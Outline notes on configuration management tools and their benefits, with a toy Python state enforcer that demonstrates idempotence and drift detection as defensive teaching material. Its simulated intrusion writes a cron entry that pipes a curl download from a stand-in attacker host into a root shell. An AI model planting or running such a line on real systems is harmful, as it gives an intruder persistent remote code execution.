-What is configuration management? (e.g. Puppet, Ansible, SaltStack, Chef)
-Why configuration management?
Example:
-configure a web server
-install packages
-edit config files
-restart services
-fiddle around + troubleshoot
-document maybe 90% of what you did (the rest lives only in your head)
-one server takes X time, two servers take 2X time -- effort scales linearly with the number of servers
-configure a web server, take 2 (shell scripts):
-keep track of shell history
-paste commands into a script
-do some basic conditional logic -- if this worked, then do this
-paste config files in
-configure a web server, take 3 (golden images):
-make image of perfect web server
-clone + run scripts to configure stuff at deployment
-hope that the servers stay that way
-write more scripts to manage stuff when it goes wrong
-when stuff changes, create a new base image, slowly push out to servers in batches
-pray, swear, troubleshoot, fix, repeat
-configure a web server, take 4 (configuration management):
-declare the desired STATE, instead of scripting the PROCESS
-1 or 100 servers...all the same
-KEEP MANAGING STATE AFTER YOU HAVE DEPLOYED, not only at deployment time
-which servers are still running the old version of package xyz?
-on which servers has this config file been changed since it was deployed?
-did an attacker add something to the web server config? To the crontab? (the tool reports whatever differs from the declared state -- but only for resources you actually declared; files you never put under management are invisible to it)
-you are not flying blind after deployment anymore
1. Automation
-repeat tasks on any number of hosts without retyping them
2. Documentation
-the declarations are forced to be fairly simple and explicit
-how does something work? Let's check!
-easy-to-explore abstraction of a process
3. Enforcement
-see what's changed, enforce compliance
-no more 'stragglers' -- huge problem in large deployments
What problems does this solve?
-system imaging is fine for a while, but then MANAGING those systems is tough
-automation
-variance in large deployments -- some old, some new, some vulnerable, some configured differently (auditing)
-no way to quickly see what state every server is in
-idempotence -- applying the same declared state twice changes nothing, so re-running is safe; most tools aim to be safer than ad-hoc scripts, which rarely check before they act
-'infrastructure as code' -- makes versioning, testing, and deployment easier
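To make the "STATE, not PROCESS" idea from the "configure a web server, take 4" section and the idempotence/auditing points above concrete, here is a toy state enforcer. It is an added illustration written for these notes, not code from Puppet, Ansible, SaltStack or Chef. It declares two resources (a web server config that must have exact content, and a cron.d file that must not exist), converges a scratch directory to that state, shows that a second run changes nothing, then simulates an intruder editing the config and dropping a crontab entry and shows how check mode reports the drift before enforcement restores it. The paths, the nginx snippet and the "backdoor" cron line are all constructed sample data.

```python
"""Toy declarative state enforcer (added example, not a real CM tool).

A resource says WHAT the host should look like; apply() works out the
steps. Running apply() on an already-converged host is a no-op
(idempotence), and check mode reports drift without touching anything.
"""
import hashlib
import tempfile
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, List, Optional


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


@dataclass
class FileState:
    """Desired state of one file: present with exact content and mode, or absent."""
    path: Path
    content: Optional[bytes] = None   # None means the file must NOT exist
    mode: int = 0o644

    def drift(self) -> List[str]:
        """Describe how the live file deviates from the declared state ([] = in sync)."""
        problems: List[str] = []
        if self.content is None:
            if self.path.exists():
                problems.append(f"{self.path}: should be absent but exists")
            return problems
        if not self.path.exists():
            return [f"{self.path}: missing"]
        live = self.path.read_bytes()
        if sha256(live) != sha256(self.content):
            problems.append(f"{self.path}: content hash {sha256(live)[:12]} "
                            f"!= declared {sha256(self.content)[:12]}")
        live_mode = self.path.stat().st_mode & 0o777
        if live_mode != self.mode:
            problems.append(f"{self.path}: mode {live_mode:o} != declared {self.mode:o}")
        return problems

    def apply(self, check: bool = False) -> bool:
        """Converge to the declared state. True if something was (or would be) changed."""
        if not self.drift():
            return False              # already converged: nothing to do
        if check:
            return True               # dry run: report only, never modify
        if self.content is None:
            self.path.unlink()
        else:
            self.path.parent.mkdir(parents=True, exist_ok=True)
            self.path.write_bytes(self.content)
            self.path.chmod(self.mode)
        return True


def converge(resources: List[FileState], check: bool = False) -> Dict:
    """Apply every resource and return a run summary, like a CM tool's changed/ok counts."""
    changed = [str(r.path) for r in resources if r.apply(check=check)]
    return {"changed": changed, "ok": len(resources) - len(changed)}


def demo() -> List[Dict]:
    """Walk through deploy, idempotent re-run, tampering, audit and enforcement."""
    root = Path(tempfile.mkdtemp())          # scratch tree standing in for a server
    nginx_conf = b"server {\n    listen 80;\n    root /var/www/html;\n}\n"  # constructed
    desired = [
        FileState(root / "etc/nginx/nginx.conf", nginx_conf, 0o644),
        FileState(root / "etc/cron.d/backdoor", None),   # declared: must not exist
    ]
    runs: List[Dict] = []
    runs.append(converge(desired))           # run 1: builds the web server
    runs.append(converge(desired))           # run 2: idempotent, nothing changes

    # Simulate an intruder: append to the web config and add a crontab entry (constructed).
    with open(root / "etc/nginx/nginx.conf", "ab") as f:
        f.write(b"    include /tmp/.evil.conf;\n")
    (root / "etc/cron.d").mkdir(parents=True, exist_ok=True)
    (root / "etc/cron.d/backdoor").write_bytes(
        b"* * * * * root curl attacker.invalid | sh\n")

    runs.append({"drift": [p for r in desired for p in r.drift()]})  # what is wrong
    runs.append(converge(desired, check=True))   # audit only: reports, touches nothing
    runs.append(converge(desired))               # enforce: restores the declared state
    runs.append(converge(desired))               # converged again: no changes
    return runs


if __name__ == "__main__":
    for step, report in enumerate(demo(), 1):
        print(step, report)
```

Two things the walkthrough shows that the outline only states: the second and last `converge()` calls report no changes at all, which is what lets you re-run the same definition on 1 or 100 servers without fear; and the drift report names exactly which declared resource differs and how, which is the "not flying blind" property. The flip side is also visible: `FileState` only knows about the two paths it was told about, so a file dropped somewhere you never declared would not appear in the report.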
For the 'small' Sysadmin?
-documentation shuffle, docs get stale
-you forget how you did stuff, since you're not deploying 10-15 servers/containers a day
-one abstraction level above shell scripts -- STATE, not PROCESS
-automate stuff (the 'large deployment' features are less important here)
-document stuff (no more awkward notes -- the Lisp ideal of "the code IS the documentation" is achieved)